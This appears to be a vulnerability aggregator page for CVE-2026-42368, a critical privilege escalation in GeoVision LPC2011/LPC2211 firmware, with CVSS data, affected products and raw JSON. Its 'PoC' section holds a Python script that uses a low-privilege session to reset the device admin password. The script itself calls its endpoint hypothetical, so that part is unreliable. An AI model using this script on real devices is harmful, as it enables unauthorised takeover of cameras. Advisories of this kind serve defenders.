Security Vulnerability Report
中文
CVE-2026-42368 CVSS 9.9 CRITICAL

CVE-2026-42368

Published: 2026-05-04 01:16:04
Last Modified: 2026-05-05 02:43:48
Source: 0df08a0e-a200-4957-9bb0-084f562506f9

Description

A privilege escalation vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to execute priviledged operation. An attacker can visit a webpage to trigger this vulnerability.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:geovision:gv-lpc2011_firmware:1.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:geovision:gv-lpc2011:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:geovision:gv-lpc2211_firmware:1.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:geovision:gv-lpc2211:-:*:*:*:*:*:*:* - NOT VULNERABLE
GeoVision LPC2011/LPC2211 1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_ip): # Target endpoint for the vulnerable Web Interface url = f"http://{target_ip}/cgi-bin/admin_exec.cgi" # Hypothetical endpoint # Headers mimicking a legitimate browser request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "sessionid=low_priv_user_token" # Use low privilege cookie } # Malicious payload to trigger privilege escalation # Example: attempting to change admin password or execute system command payload = { "action": "modify_admin", "username": "admin", "new_password": "hacked123" } try: print(f"[*] Sending exploit request to {target_ip}...") response = requests.post(url, data=payload, headers=headers, timeout=5) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Exploit successful! Privileged operation executed.") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with target IP exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42368", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-05-04T01:16:04.020", "lastModified": "2026-05-05T02:43:48.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privilege escalation vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to execute priviledged operation. An attacker can visit a webpage to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:geovision:gv-lpc2011_firmware:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "C1E349A9-4EEF-40B6-89A0-86242C2ADBC5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:geovision:gv-lpc2011:-:*:*:*:*:*:*:*", "matchCriteriaId": "87CE78D0-0894-451F-9A70-4F2A8062EC8A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:geovision:gv-lpc2211_firmware:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "0F3B818E-22D3-400A-AF2C-DEA66280464A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:geovision:gv-lpc2211:-:*:*:*:*:*:*:*", "matchCriteriaId": "59F15521-B4F3-4CCA-8C03-0A4EA2864C6E"}]}]}], "references": [{"url": "https://https://talosintelligence.com/vulnerability_reports/", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Broken Link"]}, {"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Vendor Advisory"]}]}}